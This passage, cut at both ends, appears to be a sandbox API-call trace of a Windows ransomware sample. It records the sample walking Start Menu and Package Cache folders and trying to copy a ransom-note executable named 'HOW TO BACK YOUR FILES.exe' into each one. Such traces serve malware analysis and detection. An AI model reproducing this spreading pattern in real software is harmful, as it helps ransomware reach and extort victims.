TO BACK YOUR FILES.exe" [0090.430] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\accessories\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.431] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.431] GetLastError () returned 0x0 [0090.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.431] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.431] CloseHandle (hObject=0x120) returned 1 [0090.431] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.431] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5a55e8e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a55e8e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.431] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.431] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.432] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.432] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools" [0090.432] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.432] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.432] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.433] GetLastError () returned 0x0 [0090.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.433] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.433] CloseHandle (hObject=0x120) returned 1 [0090.433] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.433] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a61cfc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a61cfc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.433] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.433] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility" [0090.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\start menu\\programs\\accessories\\accessibility\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.434] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.434] GetLastError () returned 0x0 [0090.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.434] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.434] CloseHandle (hObject=0x120) returned 1 [0090.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.435] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5a643120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a643120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.435] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.435] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache" [0090.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache" [0090.435] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.435] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.436] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.436] GetLastError () returned 0x0 [0090.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.436] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.436] CloseHandle (hObject=0x120) returned 1 [0090.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.436] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.436] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.437] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0090.437] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.437] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.437] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.438] GetLastError () returned 0x0 [0090.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.438] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.438] CloseHandle (hObject=0x120) returned 1 [0090.438] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.438] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc17ce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc17ce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.438] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.438] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.438] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0090.438] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.439] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.439] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.439] GetLastError () returned 0x0 [0090.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.439] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.439] CloseHandle (hObject=0x120) returned 1 [0090.440] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.440] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4bc3de40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc3de40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.440] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.440] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.440] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0090.440] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.440] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.441] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.441] GetLastError () returned 0x0 [0090.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.441] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.441] CloseHandle (hObject=0x120) returned 1 [0090.441] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.441] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5aa214e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5aa214e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.441] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.441] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.442] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0090.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0090.442] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.442] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.442] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.443] GetLastError () returned 0x0 [0090.443] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.443] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.443] CloseHandle (hObject=0x120) returned 1 [0090.443] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.443] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x5af303a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5af303a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.443] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.443] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0090.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0090.444] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.444] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.444] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.444] GetLastError () returned 0x0 [0090.444] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.444] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.444] CloseHandle (hObject=0x120) returned 1 [0090.445] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.445] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x5b229f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5b229f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 